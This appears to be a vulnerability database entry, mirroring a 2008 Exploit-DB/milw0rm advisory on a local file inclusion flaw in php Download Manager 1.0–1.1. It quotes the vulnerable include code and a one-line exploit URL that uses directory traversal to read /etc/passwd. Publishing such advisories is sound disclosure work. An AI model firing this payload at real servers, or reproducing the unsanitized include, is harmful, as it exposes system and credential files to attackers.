php Download Manager (v1.1 & 1.0) Local File Include

vendor:

php Download Manager

by:

BeyazKurt

8.8

CVSS

HIGH

Local File Include

CWE

Product Name: php Download Manager

Affected Version From: 1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:php_download_manager:php_download_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

php Download Manager (v1.1 & 1.0) Local File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'content' parameter to '/include/body.inc.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.

Source

Exploit-DB raw data:

#####################################################
# Author : BeyazKurt
# Contact : Bey4zKurt@Gmail.Com
#
# Script : php Download Manager (v1.1 & 1.0)
# Risk : Local File Include
# Download : http://sourceforge.net/project/showfiles.php?group_id=185482
#
# File : include/body.inc.php
#
# Code :
#   <?php
#      if (file_exists($content)) {
#      include($content);
#      } else { echo "<p>This page has no content.</p>"; }
#   ?>
#
# Exploit :
#
#  Vuln.Com/include/body.inc.php?content=../../etc/passwd
#
#----------------------------
#
#                          INDEPENDENT KOSOVA (H)
#  ARNAVUT Olmak AyrÄ±calÄ±ktÄ±r - Being An ALBANIAN Is A Priviledge
#            
#                      15 Sehidimizin ruhu saad olsun...
#
#                            Www.Netkabus.Com
#
#  Not : I Love You Gulsum (F)
#  Thnx : Ekin0x - Fotosopar seni :D
#####################################################

# milw0rm.com [2008-02-24]